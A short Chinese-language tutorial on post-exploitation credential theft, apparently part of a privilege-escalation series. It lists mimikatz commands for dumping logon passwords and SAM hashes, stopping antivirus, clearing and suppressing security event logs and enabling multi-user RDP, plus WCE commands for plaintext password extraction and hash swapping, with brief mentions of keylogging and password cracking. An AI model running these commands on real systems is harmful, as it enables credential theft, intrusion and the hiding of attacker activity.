提权心法(3)获取账号密码
获取账号密码是很强大得提权方式,比如ssh,远程登陆..等等
1.密码的获取
1.1mimikatz
这里主要介绍mimikatz这个工具为主 下载链接https://github.com/gentilkiwi/mimikatz
当然它不仅仅能获取密码
privilege::debug(提权到bug)
sekurlsa::logonPasswords(获取当前用户账号/密码)
process::list (查看当前进程)
process::start cale.exe(启动进程)
process::stop 杀毒软件(停掉杀毒软件)
lsadump::sam(读samwen文件,可能失败)
lsadump::hash(读密码)
ts::multirdp(设置多用户登陆)
event::clear(删除安全登陆日志)
event::drop(不让记录日志)
misc::cmd(启动cmd)
misc::wifi(查看wifi密码)
这里是常用功能
那么在拿到密码之后尝试远程连接的时候,会提示要断掉被攻击的登陆情况才可以远程连接
那么这个工具就又可以设置多用户登陆ts::multirdp(设置多用户登陆)
1.2WCE
wce.exe -l (显示登陆状态的账号密码) -v详细信息
wce.exe -g password (显示passord加密后的样子)
wce.exe -w 读出明文的密码
防护:注册表:
machine\system\currentcontrolset\control\las\secu
rity packages (删掉tspkg wdigest本地密码明文)
a a.psswd
b b.passwd
wce.exe -i a b.passwd (将用户a的密码改为b的密码)
1.3其他常用工具
1.4键盘记录
这个不需要很高的权限就可以监控用户的输入
2.密码的暴力破解
因为很多时候都是拿到加密后的密码
所以需要破解
2.1 ophcrack
3.2 John the Ripper
可以破解各种密码 包括操作系统的密码比如linux账户的账号密码